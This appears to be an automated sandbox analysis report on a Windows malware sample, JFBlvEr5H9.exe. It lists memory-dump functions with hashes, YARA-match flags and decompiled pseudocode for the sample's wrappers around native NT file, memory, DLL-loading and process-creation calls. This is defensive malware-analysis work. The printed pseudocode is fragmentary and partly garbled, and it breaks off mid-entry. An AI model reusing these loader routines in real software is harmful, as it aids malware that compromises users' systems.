Instruction ID: b6b494dd851508fcd6af7e26ef94d3b777f52d6c2c9c70fa0a8d45bb03bacfdb
Opcode Fuzzy Hash: 69f0e6cc5ef3304b1faefb1ae3833e2d98d83ae8b92aa53af6c4910d93ce75b3
Instruction Fuzzy Hash: 7113E3A690F3C19FCB130B386DB52D5BFB19E67218B1E08C7C4C18E4A7D158199BCB66

Uniqueness

Uniqueness Score: -1.00%

Function 01080013, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

THYd, xrefs: 010800ED

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID: THYd
API String ID: 0-973396173
Opcode ID: 262df255bc2deee2c31bcb9f18c6e886a513b3075d34ec173e625c49becee95c
Instruction ID: f6859f934dcd79f51c9a183017da474051b8b1921119e168c9eed2f3ed605e2c
Opcode Fuzzy Hash: 262df255bc2deee2c31bcb9f18c6e886a513b3075d34ec173e625c49becee95c
Instruction Fuzzy Hash: EAA13670E09249CFCB05DFB9D8415AEFFB2AF89300F24806AE495AB319E7345946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01080040, Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

THYd, xrefs: 010800ED

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID: THYd
API String ID: 0-973396173
Opcode ID: 7a2d71fa9280db182295d3153fc1e86e6419e58dbff5913d6d1a43de80504eb6
Instruction ID: c4aea1d2673b0aba15298714fa38de83b74cfce80c225292a662096fbf97fa0d
Opcode Fuzzy Hash: 7a2d71fa9280db182295d3153fc1e86e6419e58dbff5913d6d1a43de80504eb6
Instruction Fuzzy Hash: FD91F774E19209CFCB04DFAAD4415AEFFB2BF89300F20942AE455BB319E7349A468F55

Uniqueness

Uniqueness Score: -1.00%

Function 010EEC58, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6086e55432b8257d3a1469adc80160bf6d60d7e7dfee40cdcdb952ded274763f
Instruction ID: 10432494177a27f42fbc614faf5d8be89266a1836812162465aee01194cc4038
Opcode Fuzzy Hash: 6086e55432b8257d3a1469adc80160bf6d60d7e7dfee40cdcdb952ded274763f
Instruction Fuzzy Hash: EB12FCF1C917458AD338CF5DE59E1A83B61F745328BD24A08D2612BAD0DBB4816FCF44

Uniqueness

Uniqueness Score: -1.00%

Function 010EC27C, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d48457de96095cc22a732c7fea15ec2850d9b0cd7c33da8dd23057283ea040
Instruction ID: 1b3bce30df3fb9f46a3266794603592049291e01de3c2efe0700e69840613906
Opcode Fuzzy Hash: 46d48457de96095cc22a732c7fea15ec2850d9b0cd7c33da8dd23057283ea040
Instruction Fuzzy Hash: 90A16E32E0061A8FCF15DFB6C9485DDBBF2FF85300B1585AAE905AB261EB31E955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 010EEC48, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad06a78f777524bdcf84a04bbaa04fa65067a101316cbdefcf6064c4b053c1c
Instruction ID: 0a5694f5081c127de0436666a429dfa19b5c3d24dfe128a62d607c038200b1c5
Opcode Fuzzy Hash: 1ad06a78f777524bdcf84a04bbaa04fa65067a101316cbdefcf6064c4b053c1c
Instruction Fuzzy Hash: 93C15FF1C917458AD728CF69E8891A93B71FB45324FD24A09D2612BAD0DB7490AFCF44

Uniqueness

Uniqueness Score: -1.00%

Function 01080408, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0a105f791fdb8aa497c6230566908298932bcd864c5a80b9dac5389aee6884
Instruction ID: 8e4dbba0edc9246939f804a6bea642c425ae82f46ed4b30e18a3d5ae1f0f3bda
Opcode Fuzzy Hash: ec0a105f791fdb8aa497c6230566908298932bcd864c5a80b9dac5389aee6884
Instruction Fuzzy Hash: C8310772E04629CBDB68DF6AC8047DEB7B3BFC9301F14C5AAC54DA6215EB3509868F50

Uniqueness

Uniqueness Score: -1.00%

Function 01083B22, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b743e7d461bd19f34282da6058fbb9240aebd1b73f550b97a266441715e641
Instruction ID: f47c364b767f96097c97b834f3247ae2c5689dffadfb189d0cdb0a09ca70b8dc
Opcode Fuzzy Hash: 98b743e7d461bd19f34282da6058fbb9240aebd1b73f550b97a266441715e641
Instruction Fuzzy Hash: C91149719092588FDB10DFA8C419BEEBBF1AB4A714F1450A9D581BB290CB358944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01083B30, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2279ed002937d9a0d71ba8f0382a8a890d7599dcbb73770d482f98ad37a07
Instruction ID: b26e2ae4ebd099ac5323450766962bdf6077d88171bcd46d79b781cf0a46f64a
Opcode Fuzzy Hash: c2a2279ed002937d9a0d71ba8f0382a8a890d7599dcbb73770d482f98ad37a07
Instruction Fuzzy Hash: 68117C70D092588BDB04EFA9C408BEEBAF1BB8E310F149069D581B7290CB788944CF68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: JFBlvEr5H9.exe PID: 1760 Parent PID: 2036 JFBlvEr5H9.exeCOMMON

Executed Functions

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x004182ae
0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9
0x004182b0
0x004182b1
0x004182b3
0x004182b6
0x004182bf
0x004182bf
0x004182cf
0x004182d5
0x004182d7
0x004182d8
0x004182d9
0x004182d9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041838b
0x0041838d
0x0041838e
0x00418390
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Strings

hA, xrefs: 0041846C, 00418477

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: hA
API String ID: 1279760036-1221461045
Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041852D, Relevance: 3.1, APIs: 2, Instructions: 54processCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CreateExitInternal
String ID:
API String ID: 4273315900-0
Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ac
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DB0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}

0x00418533
0x00418542
0x0041854a
0x00418584
0x00418588

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}

0x004184b4
0x004184bb
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418497
0x0041849f
0x004184a2
0x004184a6
0x004184ab
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
